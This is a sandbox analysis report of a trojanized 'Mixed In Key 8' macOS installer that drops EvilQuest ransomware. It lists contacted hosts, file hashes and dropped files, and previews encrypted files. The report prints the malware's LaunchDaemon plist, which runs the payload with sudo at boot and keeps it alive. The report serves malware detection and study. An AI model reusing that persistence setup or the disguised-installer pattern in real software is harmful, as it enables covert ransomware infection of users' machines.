25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
17.171.27.65	unknown	United States	714	APPLE-ENGINEERINGUS	false
17.253.37.204	unknown	United States	6185	APPLE-AUSTINUS	false
35.173.69.207	andrewka6.pythonanywhere.com	United States	14618	AMAZON-AESUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
35.173.69.207	Mixed In Key 8.dmg	Get hash	malicious	Browse	andrewka6.pythonanywhere.com/ret.txt
	http://ads5ff8f8f.pythonanywhere.com	Get hash	malicious	Browse	ads5ff8f8f.pythonanywhere.com/favicon.ico
	http://ads5ff8f8f.pythonanywhere.com/?fbclid=IwAR3xRZR3xkuuiCNy_nq9W-DwuWrkFX9LiPgNdswk5vTGduuY1FcW_-iRm5A&h=AT3bxMNx24gWe9hA-w_cExYxI3RgLNcuNgmYaca_tNI7UQLYuccN495mhzgtVYuepQe5n67Bs0iMiRIZeeQrRCaupQyAPhNkd6dyRqJFA9abVx5M2PfACZUyV23ANGppI5Rv0g	Get hash	malicious	Browse	ads5ff8f8f.pythonanywhere.com/favicon.ico
	https://l.facebook.com/l.php?u=http%3A%2F%2Fads5ff8f8f.pythonanywhere.com%2F%3Ffbclid%3DIwAR3xRZR3xkuuiCNy_nq9W-DwuWrkFX9LiPgNdswk5vTGduuY1FcW_-iRm5A&h=AT3bxMNx24gWe9hA-w_cExYxI3RgLNcuNgmYaca_tNI7UQLYuccN495mhzgtVYuepQe5n67Bs0iMiRIZeeQrRCaupQyAPhNkd6dyRqJFA9abVx5M2PfACZUyV23ANGppI5Rv0g	Get hash	malicious	Browse	ads5ff8f8f.pythonanywhere.com/favicon.ico
	trasferimento bancario.exe	Get hash	malicious	Browse	www.stirlingpiper.com/n7ak/
	preslikavanje.exe	Get hash	malicious	Browse	www.stirlingpiper.com/n7ak/
	http://update.pythonanywhere.com/d	Get hash	malicious	Browse	update.pythonanywhere.com/favicon.ico
	http://update.pythonanywhere.com/d	Get hash	malicious	Browse	update.pythonanywhere.com/d

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
andrewka6.pythonanywhere.com	Mixed In Key 8.dmg	Get hash	malicious	Browse	35.173.69.207

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	Mixed In Key 8.dmg	Get hash	malicious	Browse	35.173.69.207
	hotbot_version3.exe	Get hash	malicious	Browse	54.235.175.90
	03062021.exe	Get hash	malicious	Browse	34.202.122.77
	85OpNw6eXm.exe	Get hash	malicious	Browse	54.226.29.2
	A4C57DF59F0C85EEBCB7B40263D8C3DE037F41B7D2D43.exe	Get hash	malicious	Browse	18.208.5.78
	payment order.docx	Get hash	malicious	Browse	54.83.52.76
	#Ud83d#Udcde_#U25b6#Ufe0fPlay_to_Listen.htm	Get hash	malicious	Browse	52.44.21.50
	OZ2SBd5M3a.docx	Get hash	malicious	Browse	54.83.52.76
	OZ2SBd5M3a.docx	Get hash	malicious	Browse	54.83.52.76
	212161C3EFE82736FA483FC9E168CE71#U007eC2#U007e1B6B2C73#U007e00#U007e1.xlsx	Get hash	malicious	Browse	34.225.233.122
	212161C3EFE82736FA483FC9E168CE71#U007eC2#U007e1B6B2C73#U007e00#U007e1.xlsx	Get hash	malicious	Browse	54.84.79.88
	New_Messagejacob@steinborn.comMessage.html	Get hash	malicious	Browse	3.224.105.128
	invoice-H9247.docx	Get hash	malicious	Browse	52.204.109.97
	print PO#6321023.docx	Get hash	malicious	Browse	54.83.52.76
	Shipping Draft Doc.exe	Get hash	malicious	Browse	54.236.162.93
	print PO#6321023.docx	Get hash	malicious	Browse	54.83.52.76
	mjzvlwau	Get hash	malicious	Browse	54.128.35.1
	SetupFA.exe	Get hash	malicious	Browse	34.195.48.210
	Zoom.pkg	Get hash	malicious	Browse	18.205.93.255
	#Ud83d#Udcde_Message_Received_05_19_21.htm.htm	Get hash	malicious	Browse	3.224.105.128

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
/Users/berri/Library/.b0MbtGgfS	Mixed In Key 8.dmg	Get hash	malicious	Browse
/Users/berri/Library/AppQuest/com.apple.questd	Mixed In Key 8.dmg	Get hash	malicious	Browse
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/.BC.T_KWbM0U	Mixed In Key 8.dmg	Get hash	malicious	Browse
/Library/AppQuest/com.apple.questd	Mixed In Key 8.dmg	Get hash	malicious	Browse
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/.BC.T_F9azqT	Mixed In Key 8.dmg	Get hash	malicious	Browse

Runtime Messages

Command:	open "/Users/berri/Desktop/Mixed In Key 8.pkg" --args
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Created / dropped Files

/Library/AppQuest/com.apple.questd Download File
Process:	/Library/mixednkey/toolroomd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	87920
Entropy (8bit):	5.9040129231424165
Encrypted:	false
SSDEEP:	768:c8V27RaSy6ISKpHnDzuJs0MdiqNi9cjHl3NI6/WQonko3BIDvUSynA234+hV4lYq:Za1y6Wy05/WQe3BIDmMVj5Snfn4+
MD5:	322F4FB8F257A2E651B128C41DF92B1D
SHA1:	EFBB681A61967E6F5A811F8649EC26EFE16F50AE
SHA-256:	5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
SHA-512:	33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Library/AppQuest/com.apple.questd, Author: Joe Security Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Library/AppQuest/com.apple.questd, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 72%
Joe Sandbox View:	Filename: Mixed In Key 8.dmg, Detection: malicious, Browse
Reputation:	low
Preview:	.......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........

/Library/LaunchDaemons/com.apple.questd.plist Download File
Process:	/Library/mixednkey/toolroomd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	435
Entropy (8bit):	5.128522920876032
Encrypted:	false
SSDEEP:	6:TMVBd/4o+tJCc4EyfdUdBRECcgVvZSXOjbwAjeJRRDvZvEqsSAL4:TMHdgo+tJVEdQiCXF+gnCR7tEyAU
MD5:	A3D34532A7DD2CD1D73CEA75DEB0677F
SHA1:	3019D1C50907FB2597121C03619990C5670FF6F4
SHA-256:	779A31E4DE99F9DE28DE8BF064C504382E050C114E2E865CC1F694C7E6339735
SHA-512:	52618A5F14247C909A3857B122A124D0DDD00890C128CF041976182423B3D728CAB11DAF5B6A1ADB6845D062B54083E72380184B6F76369482305C2782BEDD91
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>.<key>Label</key>.<string>questd</string>..<key>ProgramArguments</key>.<array>.<string>sudo</string>.<string>/Library/AppQuest/com.apple.questd</string>.<string>--silent</string>.</array>..<key>RunAtLoad</key>.<true/>..<key>KeepAlive</key>.<true/>..</dict>.</plist>

/Library/Receipts/InstallHistory.plist Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	9339
Entropy (8bit):	4.928986440703183
Encrypted:	false
SSDEEP:	96:CyCVs9djcUu/lu9MTRMTlmLfWfNfvvfufRfsGO/uuKCfuuHCfuO9CfuO8fmfwO8I:XxHhUleidZecDu8tCpQHwf7jLgo9
MD5:	40BC5C05AD587AB61B6CFC055A9A8EA3
SHA1:	41A652DC7D9A17C79D2FFA1AF7540193DB2F4DB5
SHA-256:	30325683FC6B5366E776810E6250284225A007CD0229D25A5DDD24C1EBA0931E
SHA-512:	CE750B6DD734A9E77EC703D1D655CB64A7A31BE7B499A3DE3E7DAF55B9B612648FC9ABCED1EC1C62F531FC1C7741E43A9AE268AB587B2F78CDB81E7809BFDB03
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<array>..<dict>...<key>date</key>...<date>2019-04-10T12:56:49Z</date>...<key>displayName</key>...<string>SU_TITLE</string>...<key>displayVersion</key>...<string></string>...<key>packageIdentifiers</key>...<array>....<string>com.apple.pkg.Core</string>....<string>com.apple.pkg.EmbeddedOSFirmware</string>....<string>com.apple.pkg.BridgeOSUpdateCustomer</string>....<string>com.apple.pkg.BridgeOSBrain</string>...</array>...<key>processName</key>...<string>macOS Installer</string>..</dict>..<dict>...<key>date</key>...<date>2019-04-10T13:12:47Z</date>...<key>displayName</key>...<string>JDK 11.0.2</string>...<key>displayVersion</key>...<string></string>...<key>packageIdentifiers</key>...<array>....<string>com.oracle.jdk-11.0.2</string>...</array>...<key>processName</key>...<string>Installer</string>..</dict>..<dict>...<key>date</ke

/Users/berri/..CFUserTextEncoding.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	314
Entropy (8bit):	4.385321003406041
Encrypted:	false
SSDEEP:	3:Rb6tlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:ReCBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	3D14C0A640D09A453F2DEF910EB94C9D
SHA1:	CE58BEA6FAC18A9A4F8792C1330B2C1F25CB17D3
SHA-256:	261010413BECE2DAE3F8B962D4FBC58800BF22C627F3822380A850CBBB6E1160
SHA-512:	54537D80760F37EB59EAA8743F2C7E62867038DDFCEE64641532A28AE44DA4EA351883A3BF5EB83CCCD2C979E72FC1D27B6ABD0CE2C3B2B8C728629C21BB51C5
Malicious:	false
Reputation:	low
Preview:	M...J_.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.0ACF1266-122A-4730-BFD0-867CC672C2A0.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	714
Entropy (8bit):	6.748168736262029
Encrypted:	false
SSDEEP:	12:ZdJxbk7DXijrfHRDHMXHU5XuyqCCsewLYTc+qGm7:bJxbkErRrkU5uyqCCsePc0m7
MD5:	817BD678E38715D4973D2AAB89B4A434
SHA1:	C3BC1E1E319E5C8EACAB9FEA7769E932A81982D0
SHA-256:	DCF1CD24B1FCE6CA9BAFD26504B7BD85B0E8E7D0F74A8A1BF816A31F1F2331E6
SHA-512:	4B4B29FE311CA7E41062B41D44B61D7EEF2F27B8495916EE2C14C9482EB211D6E79C228A203A21DBEB1ED12F881B511941BB05479091AED5225190307120C2BB
Malicious:	false
Reputation:	low
Preview:	.-....cC......\|4...xd.;.&..y...,D.@..cg?z..GT.....Z%).rs...5.g?z..GT...1.........e..]....ic.....e..3.@v..3......u....C..........kv.I.(.._..[.[.e.;v...f..g.'+a:3Fqr..B.EP.......?..!....e.7..i_............~s......%..4].n...$.....>5 ...Gb8..~....]C.I......'...K...v..1.J.%....U%...{.....]....z...z.x..z.....\....yn.(........L.S.9v.....e.~. W.!..........a.R+.:.!....o2...].<..._..-.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.0ACF1266-122A-4730-BFD0-867CC672C2A0.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Reputation:	low
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.0D642B43-9BB3-488B-80BD-D05FB68E4734.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.05454199773903
Encrypted:	false
SSDEEP:	6:vbEXLXbV9E5lM8BzsewLYHEec/LaqG8rQQwiQ/6:ELXbWmYsewLYTc+qGm7
MD5:	23ADDF85FD89566A999C6A27E80F1FA7
SHA1:	DE0C187E6C7E999F9420C7FA08791EE4C268E131
SHA-256:	E86267C2667521118E117C86A5C63A220847E3235526701799A9C98546424D77
SHA-512:	B506C785185F6DA2A65D31D88F23A4F7DD1B2DE2354372F570FE224C6265D8D55528933D451A52482A61BFECE678ED857850E7286DB0C43F29518ED45C9875B0
Malicious:	false
Reputation:	low
Preview:	@..V~.x5.zDvmL).0v..pJ..}.r.p...Q.1.......3..6..?...rW..0.X..k.x.......I.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.1DB5D13B-EACB-4682-B24B-3BF03D1C8158.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	370
Entropy (8bit):	5.004237775232138
Encrypted:	false
SSDEEP:	6:yIvPvZi/w+XaBzsewLYHEec/LaqG8rQQwiQ/6:dvZ8GsewLYTc+qGm7
MD5:	202B55C74E3796751D59381CEA71FCCD
SHA1:	97F8B9CD524CA16A84533F9B862320B67C245D64
SHA-256:	B20DA6AF491147F76DDD513AAF8BF507CC86CCBD559863A371D0C93E01451CCC
SHA-512:	67D2C87124347FA7C0C5CBD46167DCA450CFA7B342A3AF09EB5ED6ACD9FCEA628167CCECC2B63D97F83D58BDEBEDD5CED82228827B2BD50466B541564005E7B5
Malicious:	false
Reputation:	low
Preview:	..v..1.J.%....U0li;..C..V..t....)....Z...q.}s.B..)...j.0.X..k.A.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.20B81DCB-1DD8-44AC-B8F3-B1BEFDBB8F8B.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.164632860868185
Encrypted:	false
SSDEEP:	24:aJRGgybZVV+R9V50PZuChkU7tV2oKsRGgyFtu303KsePc0m7:afIV4R9j0PUCmUpV9Kwstu303KNpq
MD5:	B255498EC0379FF587C8B8DD394E97EA
SHA1:	D4E00780BA032292C8DE65723CEA627AA8BCAA4C
SHA-256:	9654CCCDC5753A535E73CC86031918109BD5F5F5845FBA17A87AEA101C787AB0
SHA-512:	1CE6828C9EF4FF07B5F43E5813F280EC75C3FE61D5C1789C8B4DCFD4BB552A5DBAB35345908523DC80D3FB0012CF0DEA92EE3ED39D0F461E4DA2F1175D33BF9C
Malicious:	false
Reputation:	low
Preview:	.D.cC...}.H..[..v.}....Cz2...rgI..x.......{....~).G....=...].6.'.:v.:.2..=g....E....D.4c#.o...../.....;\|y.a.R+.:.J.h}$....o.)R....[p.."..\..D.Lv(PD$h.O~.'.Gz...^.b}...,.R..Z>/.q.P../$L.5cT.v(PD$h.O......#...........R.._...92.DoJ.%....U8Z.X.......+.......@.-b..6.?......2.P.4..2....&....z.#.z............e:...^(.e..&.1B..x...I....W..O.`,.E...%..^......G....79~..).Cj.....VR...^...'.N..,.!D..../I'-...v.C...#.....Ghn...y....h...6r..k..5..'..4E.U...)....?.....#5".L.:h..o].....-..2../L.8.p.Z..l@..'.m+.......o'h8..~....].D.4c#.o...../.....;\|y.a.R+.:.Q.X.8B..L.eH......G[.M.o...YMQJ.J..[...KCl_.a.Jaf7..-K.\,..<.`..A........7T.F..uQ..?...f7..-K.\,..<.`..A..........K..q&....dt5.....#[....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................................

/Users/berri/.bash_sessions/.20B81DCB-1DD8-44AC-B8F3-B1BEFDBB8F8B.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Reputation:	low
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.28E0383D-4BF4-4BA9-ACA9-48F75870E979.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	546
Entropy (8bit):	6.2279899968977075
Encrypted:	false
SSDEEP:	6:ZxFyipuUJHPpb86bM/7DXiOMrgDurCHBzsewLYHEec/LaqG8rQQwiQ/6:ZdJxbk7DXijrm1sewLYTc+qGm7
MD5:	895CB055042E964A8D2E4823E749E740
SHA1:	2BF5C9AD316295FBAC233479D3A338E16125EF5D
SHA-256:	1F68CCBB29177E3DCD4B95FEF8C2A7C3DA7E4A8C617AC2F501D13BE92C52A712
SHA-512:	1D0ADDFE2311D89D94111800C9F487971738C28087D81B3CAABFF27E62864B8637A51CE8106ECBE6DF3FFDB4C7D149ACBD82A876927C46918290C82D3F11D129
Malicious:	false
Reputation:	low
Preview:	.-....cC......\|4...xd.;.&..y...,D.@..cg?z..GT.....Z%).rs...5.g?z..GT...1.........e..]....ic.....e..3.@v..3......u....C..........kv.I.(.._..[.[.e.;v...f..g.'+a:3Fqr..B.EP.......?..!....e.7..i_............~s......%..4....5.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.28E0383D-4BF4-4BA9-ACA9-48F75870E979.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Reputation:	low
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.2B0C6524-704B-43C0-B3BA-070EA2C35A52.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	658
Entropy (8bit):	6.612577559510055
Encrypted:	false
SSDEEP:	6:ZxFyipuUJHPpb86bM/7DXiOMrgDurbJymr9DctAEKsnEoXfifxMBzsewLYHEec/J:ZdJxbk7DXijrfHRDHMXJsewLYTc+qGm7
MD5:	1D6D12E6D046F8BCF1A1E2AB66E3D532
SHA1:	2428F0B9EE03E62809BB75658B697337A6119D87
SHA-256:	D488C501FECC3A151E5606C4F08977C8CA26FD01AFB9770C888B7D4B04081D05
SHA-512:	FFAA82E866583C795E9DAA4983D3DA690419E385F203960295DB00A8215E3B1059678383A9F92CBD62B26F482948559FA31CB12E2AC15531F45D81A74232E6FD
Malicious:	false
Reputation:	low
Preview:	.-....cC......\|4...xd.;.&..y...,D.@..cg?z..GT.....Z%).rs...5.g?z..GT...1.........e..]....ic.....e..3.@v..3......u....C..........kv.I.(.._..[.[.e.;v...f..g.'+a:3Fqr..B.EP.......?..!....e.7..i_............~s......%..4].n...$.....>5 ...Gb8..~....]C.I......'...K...v..1.J.%....U%...{.....]....z...z.x..z.....\....yn.(.........4...s.a.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.2B0C6524-704B-43C0-B3BA-070EA2C35A52.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.3113CAFA-7936-427F-AFB4-559C95AD7B13.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	738
Entropy (8bit):	6.802431376862678
Encrypted:	false
SSDEEP:	12:ZdJxbk7DXijrfHRDHMXHU5XuyqCWGhkbgsewLYTc+qGm7:bJxbkErRrkU5uyqCBhkbgsePc0m7
MD5:	CD300A0DDE39D75B4208A51A18B1BDF7
SHA1:	78E492983A94ED92337BE8F50E89E0C00FFD50DD
SHA-256:	CBE3F09CF38448E463040D146EC939223899E2FDACA8CAA4E587B5317AC70721
SHA-512:	3755B7F2A5B3D9546B2FD400584C0AB37B6B594520CCE084B2835983FBEF867DBC5B5FBAD49F4D5F112137B90A176AFBF619813992E987BA7D7A23FE3736686C
Malicious:	false
Preview:	.-....cC......\|4...xd.;.&..y...,D.@..cg?z..GT.....Z%).rs...5.g?z..GT...1.........e..]....ic.....e..3.@v..3......u....C..........kv.I.(.._..[.[.e.;v...f..g.'+a:3Fqr..B.EP.......?..!....e.7..i_............~s......%..4].n...$.....>5 ...Gb8..~....]C.I......'...K...v..1.J.%....U%...{.....]....z...z.x..z.....\....yn.(........L.S.9v.....e.~. W.!..........a.R+.:.!....o2...].<....#<....&....z.#.z.......v.n.E.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.3113CAFA-7936-427F-AFB4-559C95AD7B13.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.3C05F24B-D303-483D-AC12-ECD1041930EB.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	762
Entropy (8bit):	6.841765372062648
Encrypted:	false
SSDEEP:	12:ZdJxbk7DXijrfHRDHMXHU5XuyqCWGhk6FfrhoGsewLYTc+qGm7:bJxbkErRrkU5uyqCBhk3GsePc0m7
MD5:	E5CF531B1460F9421F7F43F87E710B6E
SHA1:	C3440F8A55C7FAD4CDBA19238BDC4893FA453F0C
SHA-256:	BBAF1566FE9FC052972A8424052489E5DA3C093F812D94C3178DDD883D1EE16C
SHA-512:	69142C08241D6D18E3B546F49A70CDE44ABA47DA54D635A7F1683772A58E41A48A58979291D2602E00CABB4FF620C59B21F3AD558D5789E6782BDE3416B389A9
Malicious:	false
Preview:	.-....cC......\|4...xd.;.&..y...,D.@..cg?z..GT.....Z%).rs...5.g?z..GT...1.........e..]....ic.....e..3.@v..3......u....C..........kv.I.(.._..[.[.e.;v...f..g.'+a:3Fqr..B.EP.......?..!....e.7..i_............~s......%..4].n...$.....>5 ...Gb8..~....]C.I......'...K...v..1.J.%....U%...{.....]....z...z.x..z.....\....yn.(........L.S.9v.....e.~. W.!..........a.R+.:.!....o2...].<....#<....&....z.#.z..........CiW.8.4.?..PV......]W.F.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.3C05F24B-D303-483D-AC12-ECD1041930EB.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
